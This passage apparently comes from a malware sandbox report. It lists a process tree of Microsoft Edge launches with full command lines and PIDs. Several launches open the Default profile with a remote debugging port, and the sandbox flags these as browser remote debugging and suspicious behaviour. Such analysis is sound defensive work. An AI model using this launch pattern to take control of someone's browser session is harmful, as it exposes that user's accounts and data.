        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,14003134387246133173,9061530922776797734,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2932 /prefetch:8
        8⤵
        
        PID:6228
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,14003134387246133173,9061530922776797734,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2772 /prefetch:2
        8⤵
        
        PID:6072
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2180,14003134387246133173,9061530922776797734,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:4996
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2180,14003134387246133173,9061530922776797734,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:2092
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,14003134387246133173,9061530922776797734,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2768 /prefetch:2
        8⤵
        
        PID:5584
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,14003134387246133173,9061530922776797734,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2252 /prefetch:2
        8⤵
        
        PID:5612
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,14003134387246133173,9061530922776797734,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3376 /prefetch:2
        8⤵
        
        PID:5804
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,14003134387246133173,9061530922776797734,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3696 /prefetch:2
        8⤵
        
        PID:6836
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,14003134387246133173,9061530922776797734,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2444 /prefetch:2
        8⤵
        
        PID:1848
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,14003134387246133173,9061530922776797734,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4516 /prefetch:2
        8⤵
        
        PID:5736
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,14003134387246133173,9061530922776797734,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2664 /prefetch:2
        8⤵
        
        PID:5128
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:5876
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffd234646f8,0x7ffd23464708,0x7ffd23464718
        8⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:1844
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,6637557963083871192,8991288314070842884,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
        8⤵
        
        PID:1400
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,6637557963083871192,8991288314070842884,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2444 /prefetch:3
        8⤵
        
        PID:2120
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,6637557963083871192,8991288314070842884,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3008 /prefetch:8
        8⤵
        
        PID:7032
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2116,6637557963083871192,8991288314070842884,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1476
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2116,6637557963083871192,8991288314070842884,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1128
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,6637557963083871192,8991288314070842884,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2976 /prefetch:2
        8⤵
        
        PID:4960
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,6637557963083871192,8991288314070842884,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3576 /prefetch:2
        8⤵
        
        PID:6376
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,6637557963083871192,8991288314070842884,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2940 /prefetch:2
        8⤵
        
        PID:2572
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,6637557963083871192,8991288314070842884,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3984 /prefetch:2
        8⤵
        
        PID:564
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,6637557963083871192,8991288314070842884,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3616 /prefetch:2
        8⤵
        
        PID:6248
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,6637557963083871192,8991288314070842884,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4536 /prefetch:2
        8⤵
        
        PID:6348
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,6637557963083871192,8991288314070842884,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4508 /prefetch:2
        8⤵
        
        PID:6320
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,6637557963083871192,8991288314070842884,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4632 /prefetch:2
        8⤵
        
        PID:6616
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:7012
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffd234646f8,0x7ffd23464708,0x7ffd23464718
        8⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6924
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,15144954021910563450,16915804848920680309,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:2
        8⤵
        
        PID:224
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,15144954021910563450,16915804848920680309,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3
        8⤵
        
        PID:5928
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,15144954021910563450,16915804848920680309,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2760 /prefetch:8
        8⤵
        
        PID:6044
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2236,15144954021910563450,16915804848920680309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1088
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2236,15144954021910563450,16915804848920680309,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:4448
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,15144954021910563450,16915804848920680309,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2408 /prefetch:2
        8⤵
        
        PID:2800
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,15144954021910563450,16915804848920680309,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2412 /prefetch:2
        8⤵
        
        PID:872
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,15144954021910563450,16915804848920680309,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3956 /prefetch:2
        8⤵
        
        PID:4296
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,15144954021910563450,16915804848920680309,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4036 /prefetch:2
        8⤵
        
        PID:4704
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,15144954021910563450,16915804848920680309,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4292 /prefetch:2
        8⤵
        
        PID:2952
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,15144954021910563450,16915804848920680309,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3788 /prefetch:2
        8⤵
        
        PID:5192
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,15144954021910563450,16915804848920680309,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4040 /prefetch:2
        8⤵
        
        PID:1164
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,15144954021910563450,16915804848920680309,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3584 /prefetch:2
        8⤵
        
        PID:4376
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:1420
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
